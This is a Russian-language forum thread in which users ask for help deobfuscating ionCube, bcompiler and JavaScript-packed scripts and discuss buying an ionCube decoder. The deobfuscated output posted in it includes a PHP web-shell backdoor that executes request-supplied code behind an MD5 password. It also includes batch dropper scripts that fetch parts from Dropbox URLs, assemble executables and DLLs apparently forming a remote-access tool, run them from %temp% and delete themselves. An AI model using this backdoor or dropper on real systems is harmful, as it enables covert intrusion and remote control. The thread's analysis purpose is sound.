Помощь со скриптами Здравствуйте! Пожалуйста, если Вам не сложно, помогите деобфусцировать несколько скриптов. Вот - http://rusfolder.com/37580307 Я буду очень признателен, если Вы поможете!
В общем предлагают мне купить декодер ионкуба 8. Дал на проверку файлик закодированный, раскодировали не некоторые переменные остались не вскрыты. Нужно ручками добивать, как я понял там Base64. Можна ли как-то автоматизировать процес деобфускации , написать скриптик ? Файл до и после снятия защиты прикрепил. Еще вопрос: это декодер ионкуба плохо вскрыл или там было дополнительное шифрование помимо ионкуба ? Стоит ли покупать такой декодер ? Еще заметил в файле переменные вида $eaahgfejee, как их вскрыть ? Под ионкубом -http://rghost.ru/48247535 Вскрытый - http://rghost.ru/48247557
Интересует раскодирование нескольких файлов закодированых bcompiler. Про оплату и другие вопросы - в личке.
Так расшифруй сам, например, тут: http://jsunpack.jeek.org/ Или сам напиши в начале кода что-нибудь вроде Code: zzz = eval; eval = function(zz) { document.write("<textarea>" + zz + "</textarea>"); return zzz(zz); }; и открой страницу в браузере
Большое спасибочки извените за мою наглость помогите еще с одним файликом. http://pastebin.com/HnSTai1S
http://pastebin.com/ij2rUrQD Всё элементарно можно сделать самостоятельно с помощью PHP Generic Eval Unpacker из первого поста.
PHP: eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '7e0b6386436f8da3bbcf9677a4626456') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")
Code: if exist g0t.exe (goto stp) else (goto strt) :strt copy /b "g3.jp" + "un3.jp" + "z3.jp" "fr0.jp" echo http://dl.dropboxusercontent.com/u/156444131/MX/th41l3/u.jp>>-c.jp copy /b "fr0.jp" "cycle.cmd" cy%QHY QGA%.cmd :stp exit Code: S%.jp" + "tape.jp" + "onth.jp" "gdiplus.dll" copy /b "gtix.jp" + "frwl.jp" + "mknp.jp" "dsfVorbisDecoder.dll" copy /b "tkth.jp" + "hewb.jp" "Hebrew.lg" copy /b "into.jp" + "nipto.jp" + "binm.jp" + "ver0.jp" "dr0.cmd" move /y "dr0.cmd" "%temp%\dr0.cmd" call "%temp%/dr0.cmd" :sir del /f /q *.jp del %0 Code: pad.exe e %g0tt% notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/z1.jp notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/z2.jp notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/un.jp notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/un2.jp copy /b "z1.jp" + "z2.jp" "7z.dll" copy /b "un.jp" + "un2.jp" "4np.exe" 4np.exe x -bd -y -o%temp% u.jp cd %temp%\jp copy /b "vinj.jp" + "init.jp" "vp8encoder.dll" copy /b "exua.jp" + "mrsh.jp" "RWLN.dll" copy /b "huts.jp" + "finl.jp" + "endx.jp" + "tlx4.jp" + "xcon.jp" "%JOKE%%COKE%. exe" copy /b "judg.jp" + "rpcs.jp" "RIPCServer.dll" copy /b "hexl.jp" + "misc.jp" "vp8decoder.dll" copy /b "link.jp" + "outm.jp" + "masm.jp" + "titk.jp" + "lilo.jp" + "hexn.jp" + "temp.jp" + "dild.jp" + "take.jp" "dsfVorbisEncoder.dll" copy /b "dynm.jp" + "m0.jp" + "exti.jp" "msvcr90.dll" copy /b "10v3.jp" + "halk.jp" "msvcp90.dll" copy /b "mvcm.jp" + "tmkx.jp" "Microsoft.VC90.CRT.manifest" copy /b "dymo.jp" + "hexp.jp" + "gixj.jp" "rfusclient.exe" copy /b "mikx.jp" + "m4i%QP И т.д.